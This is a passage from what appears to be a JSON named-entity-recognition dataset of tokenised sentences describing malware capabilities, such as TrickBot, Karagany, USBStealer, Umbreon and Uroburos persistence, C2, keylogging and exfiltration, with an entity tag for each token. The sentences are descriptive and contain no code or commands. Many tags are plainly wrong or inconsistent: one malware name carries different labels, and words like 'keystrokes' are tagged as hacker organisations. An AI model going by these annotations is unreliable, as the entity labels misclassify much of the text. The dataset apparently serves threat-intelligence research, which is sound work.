"TrickBot", "uses", "HTTPS", "to", "communicate", "with", "its", "C2", "servers,", "to", "get", "malware", "updates,", "modules", "that", "perform", "most", "of", "the", "malware", "logic", "and", "various", "configuration", "files." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "macros", "in", "Excel", "documents", "to", "download", "and", "deploy", "the", "malware", "on", "the", "user’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "establishes", "persistence", "by", "creating", "an", "autostart", "service", "that", "allows", "it", "to", "run", "whenever", "the", "machine", "boots." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "monitor", "the", "titles", "of", "open", "windows", "to", "identify", "specific", "keywords." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "secure", "C2", "communications", "with", "SSL", "and", "TLS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Trojan.Karagany", "can", "steal", "data", "and", "credentials", "from", "browsers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "has", "used", "plugins", "with", "a", "self-delete", "capability." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "enumerate", "files", "and", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "upload,", "download,", "and", "execute", "files", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "capture", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "create", "directories", "to", "store", "plugin", "output", "and", "stage", "data", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "dump", "passwords", "and", "save", "them", "into", "<code>\\ProgramData\\Mail\\MailAg\\pwds.txt</code>." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "base64", "encode", "and", "AES-128-CBC", "encrypt", "data", "prior", "to", "transmission." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "use", "Tasklist", "to", "collect", "a", "list", "of", "running", "tasks." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "create", "a", "link", "to", "itself", "in", "the", "Startup", "folder", "to", "automatically", "start", "itself", "upon", "system", "restart." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "take", "a", "desktop", "screenshot", "and", "save", "the", "file", "into", "<code>\\ProgramData\\Mail\\MailAg\\shot.png</code>." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "samples", "sometimes", "use", "common", "binary", "packers", "such", "as", "UPX", "and", "Aspack", "on", "top", "of", "a", "custom", "Delphi", "binary", "packer." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "detect", "commonly", "used", "and", "generic", "virtualization", "platforms", "based", "primarily", "on", "drivers", "and", "file", "paths." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "capture", "information", "regarding", "the", "victim's", "OS,", "security,", "and", "hardware", "configuration." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "gather", "information", "on", "the", "network", "configuration", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "use", "netstat", "to", "collect", "a", "list", "of", "network", "connections." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "Trojan.Karagany", "can", "gather", "information", "about", "the", "user", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "inject", "a", "suspended", "thread", "of", "its", "own", "process", "into", "a", "new", "process", "and", "initiate", "via", "the", "<code>ResumeThread</code>", "API." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "communicate", "with", "C2", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Trojan.Karagany", "can", "perform", "reconnaissance", "commands", "on", "a", "victim", "machine", "via", "a", "cmd.exe", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Trojan.Mebromi", "performs", "BIOS", "modification", "and", "can", "download", "and", "execute", "a", "file", "as", "well", "as", "protect", "itself", "from", "removal." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "establish", "persistence,", "Truvasys", "adds", "a", "Registry", "Run", "key", "with", "a", "value", "\"TaskMgr\"", "in", "an", "attempt", "to", "masquerade", "as", "the", "legitimate", "Windows", "Task", "Manager." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Truvasys", "adds", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "use", "WinRAR", "to", "create", "a", "password-protected", "archive", "for", "files", "of", "interest." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "has", "the", "ability", "to", "use", "a", "XOR", "decryption", "key", "to", "extract", "C2", "server", "domains", "and", "IP", "addresses." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "search", "for", "specific", "files", "and", "list", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "download", "additional", "files", "and", "tools", "from", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "insert", "pseudo-random", "characters", "into", "its", "network", "encryption", "setup." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "store", "copied", "files", "in", "a", "specific", "directory", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "disguise", "as", "a", "legitimate", "service", "to", "blend", "into", "normal", "operations." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "use", "VMProtect", "for", "obfuscation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Turian", "can", "scan", "for", "removable", "media", "to", "collect", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "has", "the", "ability", "to", "use", "Python", "to", "spawn", "a", "Unix", "shell." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "establish", "persistence", "by", "adding", "Registry", "Run", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turian", "has", "the", "ability", "to", "take", "screenshots." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Turian", "can", "retrieve", "system", "information", "including", "OS", "version,", "memory", "usage,", "local", "hostname,", "and", "system", "adapter", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "retrieve", "the", "internal", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "retrieve", "usernames." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Turian", "has", "the", "ability", "to", "use", "<code>/bin/sh</code>", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turian", "has", "the", "ability", "to", "use", "HTTP", "for", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turian", "can", "create", "a", "remote", "shell", "and", "execute", "commands", "using", "cmd." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "UACMe", "contains", "many", "methods", "for", "bypassing", "Windows", "User", "Account", "Control", "on", "multiple", "versions", "of", "the", "operating", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "takes", "advantage", "of", "the", "/SetNotifyCmdLine", "option", "in", "BITSAdmin", "to", "ensure", "it", "stays", "running", "on", "a", "system", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "has", "used", "GitHub", "and", "a", "public", "blog", "service", "in", "Hong", "Kong", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "can", "upload", "and", "download", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "can", "list", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "encrypts", "instructions", "in", "its", "C2", "network", "payloads", "using", "a", "simple", "XOR", "cipher." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "UBoatRAT", "checks", "for", "virtualization", "software", "such", "as", "VMWare,", "VirtualBox,", "or", "QEmu", "on", "the", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "UBoatRAT", "can", "start", "a", "command", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "the", "capability", "to", "gather", "the", "victim's", "current", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "UPPERCUT", "can", "download", "and", "upload", "files", "to", "and", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "can", "capture", "desktop", "screenshots", "in", "the", "PNG", "format", "and", "send", "them", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "versions", "of", "UPPERCUT", "have", "used", "the", "hard-coded", "string", "“this", "is", "the", "encrypt", "key”", "for", "Blowfish", "encryption", "when", "communicating", "with", "a", "C2.", "Later", "versions", "have", "hard-coded", "keys", "uniquely", "for", "each", "C2", "address." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "the", "capability", "to", "gather", "the", "system’s", "hostname", "and", "OS", "version." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "the", "capability", "to", "gather", "the", "victim's", "proxy", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "the", "capability", "to", "collect", "the", "current", "logged", "on", "user’s", "username", "from", "a", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "the", "capability", "to", "obtain", "the", "time", "zone", "information", "and", "current", "timestamp", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "has", "used", "HTTP", "for", "C2,", "including", "sending", "error", "codes", "in", "Cookie", "headers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPPERCUT", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "all", "non-removable", "drives", "on", "a", "victim,", "USBStealer", "executes", "automated", "collection", "of", "certain", "files", "for", "later", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "automatically", "exfiltrates", "collected", "files", "via", "removable", "media", "when", "an", "infected", "device", "connects", "to", "an", "air-gapped", "victim", "machine", "after", "initially", "being", "connected", "to", "an", "internet-enabled", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "drops", "commands", "for", "a", "second", "victim", "onto", "a", "removable", "media", "drive", "inserted", "into", "the", "first", "victim,", "and", "commands", "are", "executed", "when", "the", "drive", "is", "inserted", "into", "the", "second", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "a", "removable", "media", "device", "is", "inserted", "back", "into", "the", "first", "victim,", "USBStealer", "collects", "data", "from", "it", "that", "was", "exfiltrated", "from", "a", "second", "victim." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Most", "strings", "in", "USBStealer", "are", "encrypted", "using", "3DES", "and", "XOR", "and", "reversed." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "USBStealer", "exfiltrates", "collected", "files", "via", "removable", "media", "from", "air-gapped", "victims." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "has", "several", "commands", "to", "delete", "files", "associated", "with", "the", "malware", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "searches", "victim", "drives", "for", "files", "matching", "certain", "extensions", "(“.skr”,“.pkr”", "or", "“.key”)", "or", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "collects", "files", "matching", "certain", "criteria", "from", "the", "victim", "and", "stores", "them", "in", "a", "local", "directory", "for", "later", "exfiltration." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "mimics", "a", "legitimate", "Russian", "program", "called", "USB", "Disk", "Security." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Area", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "USBStealer", "monitors", "victims", "for", "insertion", "of", "removable", "drives.", "When", "dropped", "onto", "a", "second", "victim,", "it", "also", "enumerates", "drives", "connected", "to", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "registers", "itself", "under", "a", "Registry", "Run", "key", "with", "the", "name", "\"USB", "Disk", "Security.\"" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "drops", "itself", "onto", "removable", "media", "and", "relies", "on", "Autorun", "to", "execute", "the", "malicious", "file", "when", "a", "user", "opens", "the", "removable", "media", "on", "another", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBStealer", "sets", "the", "timestamps", "of", "its", "dropper", "files", "to", "the", "last-access", "and", "last-write", "timestamps", "of", "a", "standard", "Windows", "library", "chosen", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "collect", "information", "from", "an", "air-gapped", "host", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "detect", "the", "victim's", "file", "or", "folder", "list." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "use", "<code>net", "user</code>", "to", "gather", "information", "about", "local", "accounts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "check", "for", "connected", "USB", "devices." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "use", "<code>tasklist</code>", "to", "gather", "information", "about", "the", "process", "running", "on", "the", "infected", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "use", "<code>net", "view</code>", "to", "gather", "information", "about", "remote", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "copy", "its", "installer", "to", "attached", "USB", "storage", "devices." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "execute", "rundll32.exe", "in", "memory", "to", "avoid", "detection." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "detect", "the", "infected", "machine's", "network", "topology", "using", "<code>ipconfig</code>", "and", "<code>arp</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "USBferry", "can", "use", "<code>netstat</code>", "and", "<code>nbtstat</code>", "to", "detect", "active", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "USBferry", "can", "execute", "various", "Windows", "commands." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Umbreon", "creates", "valid", "local", "users", "to", "provide", "access", "to", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Umbreon", "provides", "access", "to", "the", "system", "via", "SSH", "or", "any", "other", "protocol", "that", "uses", "PAM", "to", "authenticate." ], "ner_tags": [ "B-Idus", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Umbreon", "hides", "from", "defenders", "by", "hooking", "libc", "function", "calls,", "hiding", "artifacts", "that", "would", "reveal", "its", "presence,", "such", "as", "the", "user", "account", "it", "creates", "to", "provide", "access", "and", "undermining", "strace,", "a", "tool", "often", "used", "to", "identify", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Umbreon", "provides", "additional", "access", "using", "its", "backdoor", "Espeon,", "providing", "a", "reverse", "shell", "upon", "receipt", "of", "a", "special", "packet." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Umbreon", "provides", "access", "using", "both", "standard", "facilities", "like", "SSH", "and", "additional", "access", "using", "its", "backdoor", "Espeon,", "providing", "a", "reverse", "shell", "upon", "receipt", "of", "a", "special", "packet" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Unknown", "Logger", "is", "capable", "of", "stealing", "usernames", "and", "passwords", "from", "browsers", "on", "the", "victim", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Unknown", "Logger", "has", "functionality", "to", "disable", "security", "tools,", "including", "Kaspersky,", "BitDefender,", "and", "MalwareBytes." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Unknown", "Logger", "is", "capable", "of", "downloading", "remote", "files." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Unknown", "Logger", "is", "capable", "of", "recording", "keystrokes." ], "ner_tags": [ "I-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Unknown", "Logger", "is", "capable", "of", "spreading", "to", "USB", "devices." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Unknown", "Logger", "can", "obtain", "information", "about", "the", "victim", "computer", "name,", "physical", "memory,", "country,", "and", "date." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Unknown", "Logger", "can", "obtain", "information", "about", "the", "victim's", "IP", "address." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Unknown", "Logger", "can", "obtain", "information", "about", "the", "victim", "usernames." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "used", "a", "combination", "of", "a", "Diffie-Hellman", "key", "exchange", "mixed", "with", "a", "pre-shared", "key", "(PSK)", "to", "encrypt", "its", "top", "layer", "of", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "encoded", "outbound", "C2", "communications", "in", "DNS", "requests", "consisting", "of", "character", "strings", "made", "to", "resemble", "standard", "domain", "names.", "The", "actual", "information", "transmitted", "by", "Uroburos", "is", "contained", "in", "the", "part", "of", "the", "character", "string", "prior", "to", "the", "first", "‘.’", "character." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "its", "`Get`", "command", "to", "exfiltrate", "specified", "files", "from", "the", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "decrypt", "command", "parameters", "sent", "through", "C2", "and", "use", "unpacking", "code", "to", "extract", "its", "packed", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "DLL", "injection", "to", "load", "embedded", "files", "and", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Uroburos", "Queue", "file", "contains", "embedded", "executable", "files", "along", "with", "key", "material,", "communication", "channels,", "and", "modes", "of", "operation." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "B-SamFile", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "AES", "and", "CAST-128", "encryption", "to", "obfuscate", "resources." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "up", "to", "10", "channels", "to", "communicate", "between", "implants." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "run", "a", "`Clear", "Agents", "Track`", "command", "on", "an", "infected", "machine", "to", "delete", "Uroburos-related", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "search", "for", "specific", "files", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "store", "configuration", "information", "for", "the", "kernel", "driver", "and", "kernel", "driver", "loader", "components", "in", "an", "encrypted", "blob", "typically", "found", "at", 